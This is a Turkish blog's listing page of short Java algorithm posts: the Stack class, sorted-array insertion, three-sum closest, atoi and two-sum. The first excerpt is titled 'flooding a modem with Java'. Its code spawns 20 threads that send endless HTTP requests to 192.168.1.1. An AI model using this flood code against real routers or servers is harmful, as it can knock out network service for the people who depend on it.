java algoritma

Java ile Modem’e flood yapmak

import java.net.HttpURLConnection; import java.net.URL; public class Alffa { public static void main(String arsgs[]) { int a = 0; while(a++<20) new Thread(new Runnable() { int status = 0; @Override public void run() { while(true) try { URL url = new URL(“http://192.168.1.1″); HttpURLConnection connection = (HttpURLConnection) url.openConnection(); connection.getInputStream(); System.out.println(Thread.currentThread().getName()+”-“+status+++”,”+connection.getResponseCode()); } catch (Exception e) { e.printStackTrace(); } } …

Java ile Modem’e flood yapmak Read More »

Java Stack Sınıfını Kullanmak

public class Stack extends Vector Stack sınıfı son giren ilk çıkar(Last in first out ((LIFO)) algoritmasına göre çalışan bir yığındır. Stack sınıfı vector sınıfını beş method ile extend eder böylelikle bir vektörü stack olarak kullanabilmeye olanak sağlar. Bir stack nesnesi yaratıldığında, içerisinde hiç bir eleman bulundurmaz. Stack algoritmasının yanında daha geniş ve tutarlı LIFO yapısı …

Java Stack Sınıfını Kullanmak Read More »

Java’da Sıralı bir Diziye Ekleme Yeri Bulmak

Verilmiş sıralı bir dizi ve girilen bir değer için eğer değer dizide varsa dizideki yerini eğer dizide yoksa dizide eklenebileceği yeri döndüren algoritma.(Not: Dizide aynı elemandan sadece bir tane olduğu varsayılacaktır.) Algoritma için  bir kaç örnek [1,3,5,6], 5 -> 2 [1,3,5,6], 2 -> 1 [1,3,5,6], 7 -> 4 [1,3,5,6], 0 -> 0 Bu aslında binary …

Java’da Sıralı bir Diziye Ekleme Yeri Bulmak Read More »

Java’da Üç Sayının Toplamının Bir Sayıya Yakınlığı

Verilmiş olan S sayı dizisi ve N sayısı için, dizideki herhangi üç sayının  N sayısına en yakın olan toplamı bulan algoritma. public int threeSumClosest(int[] nums, int target) { int min = Integer.MAX_VALUE; int result = 0; Arrays.sort(nums); for (int i = 0; i < nums.length; i++) { int j = i + 1; int k …

Java’da Üç Sayının Toplamının Bir Sayıya Yakınlığı Read More »

Java’da String’i Integer’a Çevirmek

String değişkeninin içerisindeki sayıyı bir integer değişkenine çevirmek için kullanılabilecek bir algoritma. Dikkat edilmesi gereken noktalar Null veya Boş bir String olabilir String içerisinde boşluklar olabilir + veya – işaretleri olabilir Minimum ve  Maksimum değeri aşmaması gerekiyor public int atoi(String str) { if (str == null || str.length() < 1) return 0; // trim white …

Java’da String’i Integer’a Çevirmek Read More »

Java’da Bir Sayının Dizideki İki Sayının Toplamı İle Bulunması

Bir integer dizisinde ki iki sayının toplanarak önceden belirtilmiş bir sayıya eşit olup olmayacağını bulan algoritma. Örnek olarak Sayı Dizimiz = {2, 7, 11, 15}, hedef=9 olursa algoritmamız bize 0 ve 1’i verecektir. Bu verilen değerler dizideki iki sayının toplanarak hedef’i oluşturan sayıların dizideki yeridir. Bu problemi çözmek için kullanılan Java için en iyi yöntemlerden …

Java’da Bir Sayının Dizideki İki Sayının Toplamı İle Bulunması Read More »